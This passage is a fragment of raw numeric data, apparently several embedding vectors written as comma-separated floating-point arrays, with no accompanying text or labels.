.008530768,0.052911647,-0.064003125,-0.007414178,-0.036686294,0.011810893,0.028514804,-0.037632063,0.058213774,-0.034331057,0.017495688,0.015907926,0.008475937,-0.054408416,0.009271853,0.04428797,-0.02925872,0.02440051,-0.0027645058,-0.044588625,0.021687193,-0.019632008,0.013537029,0.01695001,-0.010465933,-0.019645859,-0.039828926,-0.032145064,-0.0017898077,0.0186585,0.017833972,-0.040956993,-0.0055121956,0.015436288,-0.056604672,-0.02953852,-0.022308137,0.068487495,-0.031325545,0.033526763,-0.019697951,0.030660113,0.056755845,-0.033724155,0.00042916468,0.021500388,-0.014116323,-0.010045685,-0.0113704065,-0.02865254,-0.011097098,0.028717227,0.008879239,0.03987456,-0.028281875,-0.04624628,0.015224973,0.0011595659,-0.048717424,-0.016161885,0.019279694,-0.012349753,-0.03366173,-0.07289907,0.04096754,-0.010888678,-0.03126081,0.050842546,-0.012921056,0.02407881,-0.008672076,0.002231677,0.012049151,0.03283931,0.018583402,0.011945811,-0.030512065,0.03541508,-0.0021842269,-0.01416441,-0.013886259,0.06382079,-0.010191448,0.01358709,0.033636592,0.054453716,0.03615504,-0.011204086,-0.02567158,-0.008945658,0.007604264,0.010691382,0.057416257,-0.055698194,0.050588787,-0.053721868,0.0022635427,-0.027965365,-0.012685812,0.028225284,-0.017249731,0.034673315,0.038992517,0.035988405,0.011710878,0.040490814,-0.0055189286,0.044695806,0.01891248,-0.022281807,-0.04767741,0.013673938,-0.028203486,-0.0010382124,0.009340636,0.0042583374,0.025244182,0.007333493,0.00282368,-0.027228467,-0.0018464006,0.012721018,0.015857996,-0.022254638,-0.022047138,0.016141031,-0.026669322,0.015709113,0.0026598496,0.0017538092,-0.023036133,-0.052116755,0.026043473,0.025938181,0.05690854,0.07085525,-0.005576169,0.0023667365,0.012914715,0.03697696,0.022609318,-0.064222574,-0.017531918,0.022130704,-0.022838747,0.0115826605,-0.06434341,0.023878781,0.049958657,0.046846546,0.047337085,-0.0043019056,-0.0044787508,-0.044818997,0.0649775,-0.06698731,-0.012887233,0.054914743,-0.028401883,0.04236085,0.0074445126,-0.0346961,0.011303991,0.030742249,0.030170849,-0.018040229,-0.03595066,0.08792416,-0.008184945,-0.0022837343,0.0058504385,0.023675004,0.059812725,-0.010801265,-0.042068906,-0.042087957,0.02630189,0.022336181,-0.015028572,-0.012291338,0.041143768,-0.011931143,-0.008737678,-0.018066863,0.009755765,-0.036905184,0.0484395,0.02086904,0.0016719615,0.02054867,0.037232984,-0.028612234,0.042963494,0.017295253,0.028125687,0.02435707,0.006383416,0.028961014,0.06903403,-0.0017485124,0.026593516,0.02780022,-0.010000693,-0.027638042,-0.0177597,-0.0007823988,-0.020267045,-0.03377515,-0.113390975,0.006376314,-0.019689329,0.040634718,0.0065749725,-0.023839433,-0.03307907,0.030418336,0.020866446,-0.0039113215,0.009980928,-0.045461144,0.024472708,0.011124048,-0.0149783725,-0.02309782,-0.03903223,-0.019557707,0.017895488,-0.051539212,0.042930547,0.013711751,0.00284193,0.02477341,-0.059341893,-0.025968501,0.049193807,-0.037676375,0.0023634473,0.06650286,-0.028815296,-0.053162955,0.05140392,-0.006361859,-0.010378208,0.0026842146,-0.030653855,-0.036327276,0.010810237,0.014352013,0.033955347,-0.033409964,-0.008321807,-0.013966989,0.09883491,0.013173667,-0.0041312543,0.0046791905,0.011945177,0.028505916,0.005346649,0.04795884,0.027040593,-0.025763074,0.020060899,0.01232363,0.039763466,0.050518304,-0.0038322564,-0.021050785,-0.018065346,0.04499263,-0.0125986645,-0.0071264994,0.050016712,-0.049664672,-0.06641106,-0.039666995,0.021631397,0.05197878,0.05342694,-0.027406437,-0.055272125,-0.0015256196,0.042858075,-0.013062818,0.002104211,0.022402033,0.10727937,-0.008163923,0.015316099,-0.040122323,0.025140999,0.014989365,0.00847059,0.05517466,-0.06918095,0.04686439,0.005653879,-0.04004888,-0.018233461,-0.01834,0.040720526,0.009018392,-0.031771146,-0.0062833442,-0.0087506445,-0.09159275,-0.0007137721,0.0073618414,-0.05282532,0.017480657,0.0011584405,0.055182464,0.014591276,-0.015908672,-0.10091076,-0.007551812,-0.01817606,0.06327431,0.028125845,-0.075219385,0.014849742,0.0071501825,0.0068416228,-0.027673747,0.046587553,0.005247979,-0.02386539,-0.030088652,-0.0142800575,0.010721603,0.076954976,0.030790996,0.06027547,0.074403,-0.055225383,-0.025088144,0.04483743,-0.012964123,0.05954032,-0.019066265,-0.073277645,0.0025038782,-0.010936902,-0.0051748063,0.012906074,-0.0152117,0.030025315,-0.01380635,0.016053665,-0.00084982807,-0.051941693,0.0014725256,-0.02363428,-0.0605699,0.029394396,-0.033009447,-0.04430911,-0.012809642,0.022988323,-0.058626115,0.056909088,-0.0041374844,0.008059055,0.02928246,-0.017672986,-0.0073380927,0.012888298,0.039400168,-0.012688877,0.013326779,0.047800183,0.04464916,0.027557738,0.022738844,0.015167321,0.0029766979,0.02802246,-0.016271494,-0.014074129,0.021327853,0.028657082,-0.063051514,0.053996883,-0.022854628,-0.027019905,-0.013132333,-0.011055094,-0.011862925,-0.0047656237,0.0067144427,-0.016145924,-0.020648425,-0.027726885,0.022155069,0.027767465,-0.002268958,0.0038759233,-0.036291596,0.010925621,-0.03913048,-0.007977183,0.0349106,0.02001498,0.002120112,-0.042546142,-0.0059310202,0.009836556,0.005693255,0.015994584,-0.014016392,-0.054417804,-0.05184226,0.00048599474,-0.046398774,-0.006692818,0.005824151,-0.060946327,-0.019980486,-0.01588586,-0.009563282,-0.02606634,-0.032993313,0.026163556,0.03709434,0.032737095,-0.01367025,0.010471931,0.011007079,0.019600512,-0.019667575,-0.04360916,-0.107364714,0.0034752004,0.040691964,0.09740464,-0.047099646,0.05582304,0.010170896,-0.05914228,0.026758792,-0.0029164993,0.0052563054,0.05714211,0.005084396,-0.030973254,-0.029873079,0.027806457,-0.030389339,0.050331157,-0.017194059,0.02365609,-0.04571665,0.0062909615,-0.07406649,0.010250429,-0.04701347,0.028906384,0.01986505,-0.053899694,-0.03305391,-0.019228041,0.009500619,-0.037382,0.033310704,-0.021073733,-0.014432014,-0.06494565,-0.0005325848,-0.05578375,-0.013285565,-0.0059913076,0.02514857,0.038987607,-0.029566903,0.015984135,0.028389653,0.08772991,-0.016284665,0.02375094,0.061403546,0.056823086,-0.0334532,0.052832443,0.07382058,0.02714599,-0.0061847456,-0.026506789,-0.03200785,0.055291116,-0.060011014,-0.06850078,-0.013174359,-0.0030661763,0.026281018,-0.031758916,0.034675777,0.007296751,-0.0018878677,0.006963697,-0.024585033,-0.05326783,-0.016402263,0.041476052,0.049127877,-0.0139690805,-0.049887292,-0.043216456,0.028315222,0.059721597,-0.011867004,-0.012141141,-0.0032254022,-0.04270927,0.01618112,-0.0024572767,-0.036022183,0.008508373,-0.041453425,0.04496712,-0.018583378,0.015412416,-0.061233472,-0.0398711,-0.05506416,0.009353976,-0.01609388,0.015066181,0.039020386,-0.02547921,-0.03429655,-0.045593947,0.06455246,-0.013036842,0.046120044,0.0089064175,0.010073627,-0.018338507,-0.019581925,0.03431226,0.01249339,0.008154444,-0.048960716,-0.011366882,-0.0105054565,-0.014285967,0.035921853,0.065986656,0.06235235,-0.024170512,-0.0097397305,-0.029773805,0.024986587,0.03372998,-0.013090271,-0.035125747,-0.02489161,-0.0139801055,0.013536597,0.050572187,-0.07604164,0.004052319,0.031552844,0.0031288287,-0.03168418,-0.052964684,0.042350873,-0.014026699,0.027621113,-0.018002106,-0.028024122,-0.04397019,-0.060904853,-0.050110918,0.024127781,-0.007868074,0.016317269,-0.013247788,-0.014120003,-0.031804603,0.062828764,0.021168157,-0.036947586,0.017651288,-0.02068935,0.013765464,0.03110025,0.018470852,-0.016832698,0.023500156,0.063127466,0.104280226,0.07911887,0.013927168,-0.035348266,0.051807057,0.011850313,-0.040379196,-0.027340487,-0.042670783,-0.06220639],[0.030682536,0.0689608,-0.173518,-0.072816774,0.054477736,-0.051845796,-0.015665533,0.029542001,-0.022276845,-0.050242264,0.030679055,-0.006288475,0.10758698,-0.028057707,0.040325988,-0.06469385,-0.04558799,-0.04654827,-0.044002637,0.047557022,-0.046732504,0.013614799,0.0067452616,-0.023187675,0.05809871,0.05986308,-0.023469161,-0.03118304,-0.028756412,0.0038542917,0.025562732,-0.008679103,-0.03505137,0.030477785,-0.0656804,-0.010399273,0.020956792,0.016166037,-0.006061523,0.04421159,0.028282357,0.027069448,-0.01838114,-0.028216362,0.027627958,0.027656257,-0.0049416525,-0.015616897,0.07514754,-0.041968472,-0.018200954,0.040397402,0.018848026,0.054101426,0.0777329,0.038678635,-0.008772006,0.025065208,0.03163508,-0.041850276,0.08715308,0.07443906,-0.09155646,0.038410187,0.048965454,-0.05099018,-0.023942595,0.030487072,0.028631588,-0.06704835,0.027825296,-0.0047737258,0.014043604,0.04332641,-0.06400336,-0.04546905,-0.019136908,-0.006966216,-0.0012892348,0.054078855,0.03442474,-0.008600401,0.09500672,0.02593608,0.06610908,-0.028868875,-0.034220982,-0.009196205,-0.0077761463,0.079738095,0.035126086,-0.019092735,0.029450187,-0.007516084,-0.046649296,0.018806161,0.0071539064,0.02920964,-0.06920212,-0.018368397,-0.074725546,0.0061037773,0.01855971,0.041153483,0.016880691,0.053495623,-0.005615142,0.008567305,-0.03596649,0.0088867545,-0.028296527,0.053245746,-0.025075022,-0.005405873,-0.019006116,-0.031094743,0.051594898,-0.026801318,-0.0007197653,0.058937185,0.0022843068,-0.030322982,0.014844714,0.0707687,-0.03150493,-0.0109596,-0.01285767,0.036515504,-0.01931203,-0.044712048,-0.0073963846,-0.040478516,-0.020467063,-0.016689174,0.022183307,0.08784606,-0.083521634,-0.015066402,0.0017113204,0.03846262,0.028083496,0.016936159,-0.015036896,-0.01835025,0.0060281255,-0.011200639,0.039101455,-0.030913496,-0.043187894,0.038495712,0.05750696,0.0400231,-0.032421988,-0.008363414,0.010184972,0.002595048,0.0246961,-0.02494173,-0.018068759,0.004906448,0.008243933,0.03137399,-0.07243677,0.025110826,-0.0033249303,-0.062725134,-0.0118922815,0.035162885,-0.018713899,0.042085804,-0.10016884,-0.008144248,0.009214204,-0.008534234,0.030241905,-0.039387807,0.037465893,-0.008194356,0.07454643,0.02480321,0.007950546,-0.074272044,0.025482291,0.002134825,-0.016194852,-0.04227874,-0.008780896,0.0104992995,0.011785224,-0.01801574,0.011664128,-0.021538744,-0.02377597,0.0017764951,-0.026361344,-0.030628912,0.0150765,0.0019945086,0.014628005,-0.033965796,-0.026927924,-0.0005910116,-0.07980076,-0.008359687,-0.031634346,0.061504666,0.0034715843,0.021194393,-0.052404694,0.04843213,0.03296042,-0.004298856,0.00861765,0.028504694,-0.010094451,-0.007831071,-0.0041000727,-0.009239661,-0.025586234,0.055199232,0.007940913,0.0018135943,0.012140799,-0.015915778,0.011945498,0.027360402,-0.044079565,0.009224881,0.018717222,-0.0023490568,-0.030145112,-0.07101711,0.053269748,-0.0033087726,-0.0046536457,0.017919794,-0.000029911926,0.08540541,-0.025942763,0.032372992,0.0056281323,0.027874095,-0.014349808,-0.01595984,-0.03316238,-0.009498413,0.0131241325,-0.01857405,-0.018282944,0.05755623,0.017546233,-0.025306525,0.041678593,0.06069505,0.043398775,-0.02758809,-0.038051017,0.012131977,-0.014985267,0.0032134317,0.061350323,-0.03873299,0.01183672,-0.085659966,-0.030187773,-0.012862248,-0.009583626,-0.022254348,0.0065049124,0.01265535,0.059768114,0.04014727,0.016481852,0.001806416,-0.0010127386,0.04918648,-0.016348053,-0.03958792,-0.04459266,-0.023778668,-0.01992443,-0.011448087,-0.035141908,0.014227509,-0.030221235,0.008774328,-0.009658422,-0.000044277527,0.018639559,0.0012056152,0.009063543,-0.028354257,-0.023867004,0.03719953,0.00628639,0.019487148,0.052378237,0.009458443,-0.000994048,-0.08855033,0.04710606,0.036975276,0.065767474,0.05393469,0.017956544,0.0050652353,0.0057655345,-0.014461349,-0.011162853,-0.032673474,-0.05735196,-0.0214881,0.018296437,0.044036787,-0.057485327,0.040675484,0.037206482,-0.009562586,0.03398953,0.018371511,0.05620127,-0.052633233,0.049465857,-0.07034146,-0.02026868,0.054586735,-0.03453204,0.012013563,-0.017276837,-0.032462217,0.012760582,0.015347019,0.043860026,-0.0568693,-0.043120507,0.066625156,-0.0027493578,-0.005460153,0.008795459,0.01600857,0.030723756,0.0105737625,0.010416251,-0.057565875,0.04032764,0.028920118,-0.042618264,-0.03248224,0.06176232,-0.008914776,-0.02336093,-0.0073837857,-0.004896867,-0.022347208,0.026426394,0.0037731535,0.032436218,0.030042436,0.014534616,-0.057485953,0.050137326,0.011083073,0.040300697,0.021585345,-0.023285907,0.01271407,0.028417071,-0.007293181,0.021351552,0.0114437165,-0.0016830951,-0.019031322,0.0027267782,0.04208222,-0.004303643,-0.009889178,-0.11926416,0.017507019,-0.007866237,0.015151781,0.03788448,0.009941932,-0.010668211,0.00762781,0.034310307,-0.03803231,-0.014618829,-0.048421387,-0.0045961263,0.020289196,-0.046015996,-0.018131897,-0.053064644,-0.0148358485,-0.012239072,-0.03445466,0.010304066,0.060251042,0.026786895,0.019317385,-0.034302533,-0.059095226,0.0007040617,-0.01485327,-0.0021006109,0.054013234,-0.00593785,-0.04138352,0.03286184,0.015742712,0.006731048,0.03958011,-0.02771891,-0.05341287,-0.0036184327,0.029825337,0.054337762,-0.02418464,-0.028034406,-0.025734833,0.055086352,0.023917435,0.015299235,0.028570022,0.006387743,0.031925876,0.032881852,0.058016427,0.00054464984,0.000536237,0.03206828,0.03148998,0.014310096,0.007800741,-0.051404864,0.029848663,0.04752451,0.051027387,-0.009041154,-0.032717854,0.038252175,-0.0706228,-0.019742759,-0.034173362,0.023181384,0.073081926,0.038404815,-0.03539939,-0.08110347,0.051795628,0.009602203,-0.018112319,-0.011222419,0.0062155896,0.11252176,-0.003837216,0.010324485,0.012230936,0.0051575853,0.030293606,0.008588975,0.003821337,-0.055064026,0.043408092,0.018753903,-0.047877103,-0.030398602,-0.052780796,0.010891856,0.04267552,-0.061334,0.0044999574,0.0026344785,-0.06441525,0.017285923,0.044633154,-0.036704283,-0.005909148,-0.01844903,0.04512908,0.031943623,-0.029775243,-0.030179959,-0.05720508,0.010336467,0.032009404,0.017265752,-0.026036693,-0.016610416,-0.009531127,0.0029293376,0.005969862,0.020733207,0.004304478,-0.03775921,-0.02276913,-0.04400252,0.009845277,0.03461798,0.0041092904,0.034332428,0.060571715,-0.010505495,0.012969319,0.010127553,-0.0051873312,0.065402076,-0.05089742,-0.030487899,-0.017275942,-0.023823695,-0.0016188346,0.005535545,0.025356228,0.0137933055,-0.04271382,0.034248006,0.016269282,-0.05852567,0.015239855,-0.001167565,-0.070332006,-0.022960465,0.024432845,-0.02178703,-0.0006224135,-0.009768687,-0.052384138,0.037426706,0.0024288765,0.024313152,0.0034407214,-0.03258202,-0.028254356,0.019096786,0.030186431,-0.042928856,0.0020090567,0.06616623,0.015595841,0.004681328,0.022459047,0.023478262,-0.017807635,0.036913432,-0.029231898,-0.008257131,0.017404525,0.019359687,-0.05874796,0.053856984,-0.032887585,0.011547901,-0.022358816,0.01715611,-0.06256594,-0.010187303,-0.033562113,-0.03436146,-0.02784035,-0.03785911,0.045338277,0.049383853,0.0033129994,-0.011975175,-0.023911748,0.030255686,-0.014684258,0.012556733,0.011821096,0.00039146034,-0.03545928,0.011426863,-0.025829615,0.010583508,0.014218768,0.04463336,0.029960224,-0.041109104,-0.065396175,0.069849454,-0.022129994,0.014814848,0.016680907,-0.007929456,-0.030958803,-0.08765905,0.00245931,0.010434488,-0.037812013,-0.00023637759,0.03068017,0.026598811,-0.030658524,-0.035618197,0.013215054,-0.010568478,0.007127772,-0.064007156,-0.088238984,0.0045056194,0.008686788,0.053454254,-0.069695786,0.048613146,0.035923325,0.007827815,0.014499714,-0.042606022,0.0031791283,0.016144022,0.0024730868,-0.023213299,-0.0069749765,0.011089976,-0.06604317,0.048040267,-0.027434457,0.011521321,-0.06309095,-0.012044294,-0.0726478,0.050785854,-0.039484344,0.042799383,-0.007070767,-0.040020004,-0.01790116,-0.0023116812,0.018124478,-0.026776016,0.027031124,-0.03668,-0.025807977,-0.06798251,-0.004725929,-0.048775837,0.018311111,0.034755133,0.035615083,0.04526213,-0.058757406,0.00983298,0.025039034,0.07789911,-0.01889468,0.0039988765,0.06497942,0.041074213,-0.04631937,0.06265868,0.07805311,0.007136235,-0.0062661567,-0.016793454,-0.03639676,0.043765668,-0.03716296,-0.039870236,-0.05965994,-0.018183285,0.0050870213,0.014726689,0.005786391,-0.012860834,-0.0016162941,0.006482815,0.003003981,-0.035615433,-0.031411037,0.034469504,-0.0025869268,-0.0032275892,-0.040051393,0.014517836,0.024629394,0.03241582,0.0013990685,-0.01673236,-0.026904045,-0.00089885615,0.029536504,0.021335993,-0.017368583,-0.01832949,-0.06015983,-0.010859324,-0.012134876,0.013578622,-0.012509889,-0.018642902,-0.055714313,-0.0476135,-0.03416442,0.03296932,0.014967828,-0.014353251,-0.0012585196,-0.030324692,0.09135919,0.01102251,0.022356465,0.03367279,0.016487245,-0.0014904087,-0.0003211906,0.024041384,0.0013856419,0.0016583798,-0.044856116,-0.05872195,0.012947028,-0.0047705695,0.03709936,0.044489436,0.03898402,-0.029464386,-0.022708012,-0.013831434,0.032297205,0.018878603,-0.010531525,-0.050852604,-0.023259658,-0.0064634923,0.013690098,0.053082675,-0.036656838,0.03866434,0.016049957,-0.009254458,0.0071775774,-0.032627814,0.04624967,-0.008887344,0.0105557125,0.013447219,-0.03304051,-0.042892892,-0.05097723,-0.038510874,0.0314789,0.0062105386,0.024882575,-0.014512938,-0.036432743,-0.034371976,0.053348072,0.0059482125,-0.04690997,0.032993335,-0.0027409303,0.007995874,0.012812695,-0.02777483,-0.0073098973,-0.026892593,0.06713366,0.10750073,0.035666052,0.042069856,-0.0031162298,0.06964197,0.010516198,-0.036586035,-0.017305141,-0.022207199,-0.0020794494],[-0.0064311204,0.056669883,-0.16457057,-0.07310609,0.040151797,-0.05546408,0.0055226986,0.021738295,-0.014823956,-0.039781354,-0.009094906,0.0003315655,0.051764905,0.004199207,0.031385504,-0.05426995,-0.036972728,-0.05417178,0.0070892056,0.07949628,-0.024564333,0.027992705,0.010860155,-0.009730141,0.07973315,0.05532691,0.003036655,-0.009059489,-0.050698422,-0.02070181,0.045135014,-0.013752315,-0.012558182,0.025231736,-0.042727716,-0.028829925,0.0077282484,0.032854993,-0.032827068,0.04351752,0.035140853,0.06197091,-0.012393496,0.016074946,-0.013030379,-0.04051665,0.069536164,0.0077232015,0.05113097,-0.046597414,-0.00029197146,0.004754254,0.041386634,-0.032608,0.078616716,0.028589202,-0.016835453,0.0072570546,-0.00016998839,-0.014021299,0.103949256,0.04177625,-0.08284008,0.047058374,0.02986626,-0.023370529,-0.03184233,0.058420476,-0.013577496,-0.017839167,0.02582137,0.020185992,-0.022538817,0.036834188,-0.029885009,-0.019207869,-0.028685533,-0.032200616,0.023027677,0.043786447,0.031487063,-0.0002810588,0.09252689,-0.025788354,-0.009127998,-0.07080018,0.01640382,-0.0033912112,-0.053753223,0.040778503,0.004845727,-0.038552076,-0.019978954,0.0050458796,-0.071895026,0.01572397,0.004091958,0.057732973,-0.002089673,-0.02308376,-0.054650232,0.011965533,0.016115453,0.021318851,0.022451742,0.03351768,-0.027645078,0.021806851,0.008195748,-0.0005353364,-0.065366514,0.095200196,-0.009557419,0.013855444,-0.006955987,-0.047940474,0.02156339,-0.03442883,-0.021346312,-0.0035886536,-0.023922915,-0.027226653,0.02093224,0.06243843,-0.038013257,-0.005771398,-0.023061793,0.059492655,0.0025417202,-0.06999163,0.039861493,-0.002049315,0.009624796,-0.0047557573,0.0050729187,0.05996944,-0.059378903,-0.0006588938,-0.024318326,-0.038712617,0.00072099,0.054423686,-0.05783401,-0.018857708,0.027060952,-0.06057468,0.032728825,-0.036982097,-0.05492666,0.046896685,0.019570978,-0.015694678,-0.024082324,0.020976739,-0.011189336,-0.033619072,0.01842332,-0.025486106,-0.00046572156,0.022676913,0.034464635,0.03555959,-0.015273352,0.058082122,0.00050172996,-0.050682716,0.02601011,0.02152204,-0.019089853,0.016310314,-0.0730058,-0.0038528175,-0.004135402,0.005864487,0.008952554,-0.0053618895,0.05929332,-0.03138271,0.019413425,-0.003579881,0.012834423,-0.04617171,0.009419573,0.030729167,-0.019716704,-0.006277442,0.0069078263,-0.02353064,0.0073169186,-0.018386632,0.0005241128,-0.0063888435,-0.027270045,-0.023093462,-0.023911422,-0.0238113,-0.0032679364,-0.013069169,0.017645475,-0.036302242,-0.07628288,-0.0024386242,-0.06111834,-0.009547657,-0.037939727,0.044408467,-0.0147957355,0.06548252,-0.04375264,0.045001306,0.06341271,-0.02619266,0.009230696,0.012185808,-0.0008978192,-0.00031671365,0.0011631894,-0.060218982,-0.038575362,0.00878269,0.030406443,0.0014505647,0.018448543,-0.008118848,0.02900055,-0.0025908034,-0.0142927,0.01146934,0.010051005,-0.047308084,-0.0303089,-0.07295842,0.045182813,0.0009853209,-0.012189825,0.032717966,-0.0035591214,0.06339662,-0.027966304,0.005971466,0.02350641,0.038819917,-0.0073626046,-0.0060682297,-0.019610496,-0.021010365,0.021998946,-0.034302715,0.0022301376,0.089897156,-0.0144289825,-0.025796331,0.029702038,-0.0051988303,0.036428276,-0.021955425,-0.03945907,0.0029003257,-0.0135458065,-0.00957792,0.03568937,-0.026060553,-0.0055124913,-0.07503931,-0.053258367,-0.031757805,-0.0075407876,0.024109317,0.009507014,-0.0040016384,0.01933513,0.044105537,-0.01556434,0.006370971,-0.014789342,0.029119158,-0.05221484,-0.000073841635,-0.04147345,0.009101832,-0.0006097812,-0.013116016,-0.000040260107,-0.00825471,-0.030616783,0.022537043,-0.027944658,-0.013818268,-0.020309713,0.031909812,-0.00063934,-0.033343717,-0.05454999,0.041180257,-0.010276858,-0.013340373,0.02135459,-0.00038172287,-0.026290655,-0.046871003,0.010830098,0.06432419,0.05590869,0.024041472,-0.020541953,0.0015629311,0.0011439021,-0.027998507,0.03320454,-0.054998666,-0.08450339,0.0050262404,0.00663828,0.045816533,-0.06877289,0.030586516,0.046674076,0.039071746,0.047585804,0.017173827,0.037506226,-0.06256835,0.05019755,-0.052613467,-0.024320837,0.07593346,-0.042869817,-0.0021558364,-0.014198505,-0.03128833,0.016065408,0.019876312,0.06274517,-0.041245237,-0.009537908,0.06001212,0.005668708,-0.022558682,-0.040784094,0.018088559,0.055747878,0.013354078,0.0317942,-0.032349568,0.0044863545,0.016876895,-0.04124804,-0.00725261,0.04274849,0.03518317,-0.03264814,0.0052439133,-0.0069321403,-0.049970254,0.015711589,0.021759836,0.054115362,-0.0004432621,-0.0023806184,-0.009270371,0.03921086,-0.030633003,0.06342758,0.032894284,-0.030460313,0.029265122,0.009900954,-0.026163114,0.02588301,0.011539042,-0.0019035973,-0.054087896,-0.025168052,-0.00031792105,-0.03376915,-0.0055754995,-0.05835015,0.0135155395,-0.01964566,0.020170221,0.0524206,-0.02494069,-0.007973654,0.07360354,0.015959727,-0.026085535,0.024229452,-0.022933496,-0.00061735715,0.067311354,-0.044085253,-0.0070700007,-0.033174794,0.0016105354,0.024892088,-0.030976918,0.05423051,0.03034335,-0.015410002,0.063211635,-0.017101398,-0.05905479,-0.0116716875,-0.0047237906,0.016541172,0.013198392,-0.029586831,-0.0680274,0.045426,-0.016923336,0.016422039,0.04214804,0.019866321,-0.0057654437,0.028917627,0.02171246,0.06551345,-0.0016830252,-0.016531974,-0.023397751,0.036231507,0.054762274,0.028156465,0.0019620918,0.018867757,0.006937007,0.0026896936,0.03697491,0.01722867,0.00029672158,0.045672268,0.040067576,0.01779627,-0.035512485,-0.086598136,0.02368776,0.02034802,0.024739096,-0.00045389173,0.011955262,0.03982102,-0.05752289,-0.027418606,-0.032636378,0.055385426,0.05267991,0.027687222,-0.06416188,-0.057800192,0.03046077,-0.009264576,-0.006077462,0.0252964,0.0024846334,0.11616819,-0.026429385,0.032509297,-0.005676006,0.067365356,0.04843116,0.0063219,0.0058777053,-0.046019334,0.067481525,0.014679109,-0.026382796,-0.015261295,-0.029600902,-0.0076641846,0.058219343,-0.061693147,-0.010661127,0.03169032,-0.09431222,0.040269077,0.06337738,-0.023887616,0.012818166,-0.022600481,0.03814659,0.00310547,-0.049069133,-0.05310267,-0.04248673,-0.027740115,0.05113958,0.004218224,-0.008675378,-0.009391243,-0.003993393,0.032663923,0.0077509196,-0.025402468,-0.017538885,0.010200181,-0.04479714,-0.01721159,0.019186204,0.072441265,0.008166143,-0.0033432627,0.01716894,-0.01214167,0.02295964,0.002604241,-0.008995764,0.06406197,-0.033664666,-0.0537339,-0.03961588,-0.008024688,0.0038778107,0.0072396174,0.0038272298,0.019636853,0.0019209699,0.04992296,0.025986705,-0.068917125,0.006258571,0.008743516,-0.044445258,-0.017813168,0.01818795,-0.050686248,0.03547959,-0.00035895462,-0.09100442,0.060067967,0.007195953,0.012756914,-0.011660826,-0.04943902,-0.013667463,0.02943612,-0.023894804,-0.026909018,0.033019572,0.040356446,0.0319514,0.051598657,0.022323592,-0.017210895,-0.03543803,-0.032275893,-0.034135904,0.008096373,0.03473116,-0.020409279,-0.029170344,0.01911725,-0.04973266,0.019546833,-0.02778352,0.017942939,-0.029208919,0.0048735873,-0.025483275,-0.03955017,-0.058738228,-0.053088613,0.044760566,0.02943893,0.023158854,-0.010465163,-0.05627509,-0.0055542425,-0.007427817,0.019929038,0.02430908,0.022055276,-0.035326596,0.015218613,-0.02486515,-0.01448543,-0.049328055,0.029237462,0.03943195,-0.048397005,-0.022698637,0.03290774,-0.0305777,-0.021133048,0.036465596,-0.039602097,0.0033268668,-0.03566402,-0.04799944,-0.030790411,0.0043956283,-0.016391678,0.023461994,0.078271665,-0.013649216,0.0056928457,0.054147854,-0.023418875,0.01592772,0.0034477608,-0.061073087,-0.0024568408,0.013192079,0.05636476,-0.0391053,0.022917844,0.08684119,-0.048956756,-0.008646266,-0.0034960806,-0.011762778,0.0427758,0.00005159287,-0.0029944659,-0.017257327,0.019678744,-0.022301974,0.027775243,0.011201764,-0.014943819,-0.012453195,0.02172885,-0.04564697,0.050871953,-0.028306037,-0.005840558,0.024706682,-0.04084879,-0.033805896,-0.032069143,-0.03954232,-0.025718024,0.036260884,-0.05638645,-0.036538757,-0.07315655,0.058488805,-0.035797227,0.031998802,0.038662348,0.02873438,0.024882896,-0.019739266,0.0077538206,0.05587877,0.09150876,-0.029508874,-0.008893921,0.039249904,0.03731558,-0.015899483,0.079211265,0.10040175,0.053636633,0.005187736,0.0076169944,-0.018875333,0.03470352,-0.050885916,-0.07309298,-0.0151196355,0.011841617,-0.032847162,-0.012939428,-0.0010583912,-0.022423504,0.005313893,0.0065697245,-0.018616885,-0.038967628,-0.011711535,0.040330984,0.025894485,-0.002344132,-0.07205388,0.01733555,0.0048846994,-0.01357128,0.029135216,-0.04051533,-0.03502422,0.0100380415,0.0011757978,0.02206635,-0.057440992,0.016351372,-0.071417965,0.04764138,-0.02939472,0.008561039,0.0047217105,-0.0427143,-0.022911659,-0.047159147,-0.01676774,0.0026643083,0.010281405,0.010861514,-0.036177445,-0.015322254,0.10978503,0.022657136,0.047591116,-0.00009968865,0.007534027,0.0542507,0.009455952,-0.0035024292,0.017806655,-0.0063078785,-0.05805439,-0.016166693,0.047540534,0.015668606,0.04435465,0.02413651,0.028523274,-0.0019975284,0.009643794,-0.055742834,0.046394113,0.0068899686,-0.042289704,-0.052118655,0.0061511775,0.021261157,0.049489293,0.0404539,-0.020700563,0.020068752,-0.029507583,-0.0229783,-0.024115913,-0.041180164,0.06760057,0.027343795,0.013199171,-0.02228136,-0.023665523,-0.059045415,-0.060756326,-0.038600083,0.039863262,0.011514678,-0.022490388,-0.023175603,-0.028580159,-0.0055730506,0.06137859,0.034344047,-0.050829787,0.038443483,-0.015046047,0.01879528,0.0031954027,0.021149842,0.0038077417,-0.006636217,0.06040632,0.09753394,0.040619817,-0.00021883231,0.027265167,0.0195363,-0.0081681255,7.544266e-7,-0.0027427038,-0.025126763,-0.012621527],[0.013668716,0.03549408,-0.19835931,-0.036717527,0.07002627,-0.038749903,0.09387258,0.008706268,0.007127468,-0.04243108,0.013570094,0.029705714,0.07854147,0.036616098,-0.018699676,0.016967723,0.019811997,-0.01769335,-0.0022500742,0.010136501,-0.011179212,-0.020882748,-0.0055059376,-0.03872611,0.08075295,0.012124942,-0.025657175,-0.013873873,0.029466156,0.026179545,0.0044952193,-0.0335507,-0.0061225747,-0.005948891,-0.06817925,-0.048043605,0.07005429,0.038577057,-0.010116756,0.029776609,-0.029421784,0.0556594,0.007999956,-0.052664846,-0.0031692195,0.004942869,0.047141228,0.009640987,0.034819514,-0.060060106,-0.009609767,0.015017406,0.03557256,-0.019629639,0.08558436,0.07067569,0.018729098,0.05752339,0.0030883949,-0.043974377,0.08507858,0.023589619,-0.088545516,0.021919146,0.014026251,-0.01377355,-0.038370818,0.053910393,0.017072149,-0.021339867,0.024058081,-0.01010328,-0.013210485,0.008106113,-0.06416527,-0.024172481,-0.023660176,-0.022511214,-0.020178927,0.019194497,0.012358851,-0.030563686,0.084115125,-0.015073727,0.02926263,0.002457721,-0.018376486,0.033657134,-0.0536412,0.060051955,0.024951026,-0.024115415,0.04318305,-0.01167242,-0.049648896,0.033340435,-0.03571084,0.03969773,-0.05069852,-0.027572004,-0.031558137,0.008345601,0.013784221,-0.006111027,-0.019662932,0.03776122,0.038410977,-0.004373788,-0.02172173,-0.004452082,-0.023510652,0.033703845,-0.04501196,-0.017531928,-0.032226894,-0.046373155,0.061384983,-0.011494362,0.018362021,0.033680733,-0.022122003,-0.03441007,-0.026223058,0.05558363,-0.008584352,0.047067907,-0.086822934,0.034964036,-0.02086568,